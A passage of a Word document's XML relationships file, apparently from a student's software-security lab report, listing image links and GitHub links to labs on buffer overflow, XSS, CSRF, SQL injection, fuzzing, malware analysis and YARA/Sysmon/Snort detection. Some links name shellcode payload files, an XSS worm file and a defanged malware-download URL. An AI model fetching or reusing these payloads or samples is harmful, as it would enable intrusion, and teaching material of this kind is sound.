Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="galateo/Software-Security-Labs/main/Laboratori/5%20Malware/screen%20basic%20malware/Schermata%202023-05-11%20alle%2011.09.18.png" TargetMode="External"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/screen%20basic%20malware/Schermata%202023-05-11%20alle%2011.55.02.png" TargetMode="External"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image121.png"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/7%20Malware%20Detection/screen/Yara/Screen/Schermata%202023-07-01%20alle%2017.34.40.png" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/2%20Web-Security/Screen/CSRF/Schermata%202023-03-30%20alle%2011.24.00.png?token=GHSAT0AAAAAACAK7DHEDOH6CMKNSD5THN7WZBLCPLQ" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/Astaroth/screen/Acquisizione%20schermata%2008.05.2023%20alle%2013.32.41%20%5B1%5D.png?token=GHSAT0AAAAAACB62EF55PFHRJYZ3YFJJBHUZDSB2LQ" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/screen%20basic%20malware/dynamic/key/Acquisizione%20schermata%2023.05.2023%20alle%2012.28.21%20%5B1%5D.png" TargetMode="External"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-socket" TargetMode="External"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/7%20Malware%20Detection/screen/sysmon/Schermata%202023-07-01%20alle%2018.36.48.png" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/2%20Web-Security/Screen/XSS/6.png?token=GHSAT0AAAAAACAK7DHFSS2ICHR7QYK46R4CZBLDJLQ" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.png"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/7%20Malware%20Detection/screen/sysmon/Acquisizione%20schermata%2003.07.2023%20alle%2012.37.24%20%5B1%5D.png" TargetMode="External"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/7%20Malware%20Detection/screen/snort/Schermata%202023-07-05%20alle%2010.16.24.png" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/3%20Fuzzing/screen%20fuzzing/Acquisizione%20schermata%2028.06.2023%20alle%2016.56.43%20%5B1%5D.png" TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.png"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image94.png"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image101.png"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image142.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/4%20StaticAnalysis/screen%20static%20analisys/Schermata%202023-06-29%20alle%2017.06.27.png" TargetMode="External"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/7%20Malware%20Detection/screen/snort/Schermata%202023-07-13%20alle%2012.09.40.png" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/4%20StaticAnalysis/screen%20static%20analisys/Schermata%202023-06-29%20alle%2016.01.57.png" TargetMode="External"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/screen%20basic%20malware/Schermata%202023-05-11%20alle%2011.14.47.png" TargetMode="External"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image112.png"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image151.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/7%20Malware%20Detection/screen/Yara/Screen/Schermata%202023-07-01%20alle%2017.42.36.png" TargetMode="External"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mgalateo/Software-Security-Labs/blob/main/Laboratori/2%20Web-Security/sql-injection/image_www/Code/defense/unsafe.php" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/Astaroth/screen/Acquisizione%20schermata%2008.05.2023%20alle%2013.47.05%20%5B1%5D.png?token=GHSAT0AAAAAACB62EF5M6KC76DYQBN47O3KZDSB7PA" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/screen%20basic%20malware/Schermata%202023-05-11%20alle%2011.55.59.png" TargetMode="External"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image123.png"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/7%20Malware%20Detection/screen/sysmon/Schermata%202023-07-02%20alle%2012.26.13.png" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/2%20Web-Security/Screen/CSRF/Schermata%202023-03-30%20alle%2011.31.31.png?token=GHSAT0AAAAAACAK7DHEWRN4WGPGMPWY5VQSZBLCQGQ" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/screen%20basic%20malware/dynamic/key/Acquisizione%20schermata%2023.05.2023%20alle%2012.30.46%20%5B1%5D.png" TargetMode="External"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image133.png"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.malwareanalysisbook.com" TargetMode="External"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image160.png"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/7%20Malware%20Detection/screen/sysmon/Acquisizione%20schermata%2003.07.2023%20alle%2012.36.18%20%5B1%5D.png" TargetMode="External"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/7%20Malware%20Detection/screen/snort/Schermata%202023-07-05%20alle%2010.15.21.png" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/1%20Buffer-Overflow/Screen/fase3/Acquisizione%20schermata%2021.03.2023%20alle%2020.28.49%20%5B1%5D.png" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/2%20Web-Security/Screen/XSS/8.png?token=GHSAT0AAAAAACAK7DHEBF2E2TFVLOTNJH22ZBLDJYQ" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/2%20Web-Security/Screen/screen%20sql%20inj/4/Acquisizione%20schermata%2027.04.2023%20alle%2016.56.43%20%5B1%5D.png?token=GHSAT0AAAAAACCSA73BVWO67NW7QCMF2QMSZC6H7EA" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mgalateo/Software-Security-Labs/blob/main/Laboratori/4%20StaticAnalysis/file_static/8_macro_expressions.ql" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.png"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/screen%20basic%20malware/Schermata%202023-05-11%20alle%2011.24.06.png?token=GHSAT0AAAAAACB62EF53EB5TWTYD7YW5T2SZEYG3IQ" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.png"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.png"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image103.png"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image124.png"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image134.png"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image153.jpeg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mgalateo/Software-Security-Labs/blob/main/Laboratori/1%20Buffer-Overflow/gen_shellcode.py" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mgalateo/Software-Security-Labs/blob/main/Laboratori/2%20Web-Security/Screen/screen%20sql%20inj/1%20e%202/Acquisizione%20schermata%2027.04.2023%20alle%2016.09.28%20%5B1%5D.png" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/3%20Fuzzing/screen%20fuzzing/Acquisizione%20schermata%2028.06.2023%20alle%2011.45.11%20%5B1%5D.png" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image165.png"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/7%20Malware%20Detection/screen/snort/Schermata%202023-07-13%20alle%2012.23.05.png" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/1%20Buffer-Overflow/Screen/fase1/Acquisizione%20schermata%2021.03.2023%20alle%2018.46.16%20%5B1%5D.png" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mgalateo/Software-Security-Labs/blob/main/Laboratori/4%20StaticAnalysis/file_static/4_memcpy_definitions.ql" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/screen%20basic%20malware/Schermata%202023-05-11%20alle%2011.09.18.png?token=GHSAT0AAAAAACB62EF5IY5JW7HBYQCFAAAIZEYGRZQ" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.png"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.png"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image114.png"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image125.png"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.malwareanalysisbook.com" TargetMode="External"/><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image" Target="media/image27.png"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/7%20Malware%20Detection/screen/Yara/Screen/Schermata%202023-07-01%20alle%2018.22.57.png" TargetMode="External"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image171.png"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image178.png"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/glossaryDocument" Target="glossary/document.xml"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/4%20StaticAnalysis/screen%20static%20analisys/Schermata%202023-06-29%20alle%2017.27.24.png" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.png"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.png"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/screen%20basic%20malware/Schermata%202023-05-11%20alle%2012.02.29.png" TargetMode="External"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/screen%20basic%20malware/dynamic/Acquisizione%20schermata%2023.05.2023%20alle%2016.03.33%20%5B1%5D.png" TargetMode="External"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.png"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image115.png"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image135.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mgalateo/Software-Security-Labs/blob/main/Laboratori/1%20Buffer-Overflow/shellcode_payload" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/2%20Web-Security/Screen/CSRF/Schermata%202023-03-30%20alle%2011.39.02.png?token=GHSAT0AAAAAACAK7DHEQC7KGUU27PHGE5R4ZBLCPWQ" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image154.jpeg"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/7%20Malware%20Detection/screen/sysmon/Schermata%202023-07-02%20alle%2012.28.59.png" TargetMode="External"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image183.png"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mgalateo/Software-Security-Labs/blob/main/Laboratori/4%20StaticAnalysis/screen%20static%20analisys/Schermata%202023-06-29%20alle%2016.10.58.png" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mgalateo/Software-Security-Labs/blob/main/Laboratori/4%20StaticAnalysis/file_static/5_macro_definitions.ql" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/Astaroth/screen/Acquisizione%20schermata%2008.05.2023%20alle%2016.06.01%20%5B1%5D.png?token=GHSAT0AAAAAACB62EF4GEEK5VDPY652A2TSZDSBB2A" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.png"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/screen%20basic%20malware/Schermata%202023-05-11%20alle%2011.36.38.png" TargetMode="External"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/screen%20basic%20malware/dynamic/key/Acquisizione%20schermata%2023.05.2023%20alle%2012.41.15%20%5B1%5D.png" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mgalateo/Software-Security-Labs/blob/main/Laboratori/1%20Buffer-Overflow/scriptDistanzaP.py" TargetMode="External"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image126.png"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image144.png"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image161.png"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mgalateo/Software-Security-Labs/tree/main/Laboratori/7%20Malware%20Detection/LAB16" TargetMode="External"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/7%20Malware%20Detection/screen/snort/Schermata%202023-07-05%20alle%2010.27.42.png" TargetMode="External"/><Relationship Id="rId329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mgalateo/Software-Security-Labs/blob/main/Laboratori/2%20Web-Security/xss-elgg/malicius_warm.html" TargetMode="External"/><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image" Target="media/image52.png"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/Astaroth/screen/Acquisizione%20schermata%2008.05.2023%20alle%2017.07.19%20%5B1%5D.png?token=GHSAT0AAAAAACB62EF5VNCMOJENXLYKBHNOZDSCOPA" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.png"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.png"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image96.png"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image98.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/1%20Buffer-Overflow/Screen/fase1/Acquisizione%20schermata%2021.03.2023%20alle%2019.05.39%20%5B1%5D.png?token=GHSAT0AAAAAACAK7DHFZBMZVUSXEAV74KQ6ZBEXFDA" TargetMode="External"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image116.png"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image136.png"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image155.png"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image166.png"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/7%20Malware%20Detection/screen/snort/Schermata%202023-07-13%20alle%2012.29.24.png" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/2%20Web-Security/Screen/screen%20sql%20inj/3/Acquisizione%20schermata%2027.04.2023%20alle%2016.27.10%20%5B1%5D.png?token=GHSAT0AAAAAACCSA73AWXVQJ7RLH5ENZBVGZC6H54A" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/3%20Fuzzing/screen%20fuzzing/Acquisizione%20schermata%2028.06.2023%20alle%2012.56.26%20%5B1%5D.png" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/4%20StaticAnalysis/screen%20static%20analisys/Schermata%202023-06-29%20alle%2016.27.02.png" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/screen%20basic%20malware/Schermata%202023-05-11%20alle%2011.12.20.png?token=GHSAT0AAAAAACB62EF5ISUXS2ZTNSQPJSAMZEYGSSQ" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.png"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.png"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image106.png"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image127.png"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image145.png"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mgalateo/Software-Security-Labs/blob/main/Laboratori/7%20Malware%20Detection/screen/Yara/Screen/Schermata%202023-07-01%20alle%2017.24.44.png" TargetMode="External"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/7%20Malware%20Detection/screen/snort/Schermata%202023-07-05%20alle%2010.12.52.png" TargetMode="External"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image179.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mgalateo/Software-Security-Labs/blob/main/Laboratori/1%20Buffer-Overflow/log.txt" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/2%20Web-Security/Screen/XSS/Worm/Acquisizione%20schermata%2003.04.2023%20alle%2012.50.04%20%5B1%5D.png?token=GHSAT0AAAAAACAK7DHECZ7WNOSDV74INKRIZBLDXVA" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mgalateo/Software-Security-Labs/blob/main/Laboratori/4%20StaticAnalysis/file_static/9_class_network_byteswap.ql" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.png"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image184.png"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image77.png"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.practicalmalwareanalysis.com/updater%5b.%5dexe" TargetMode="External"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 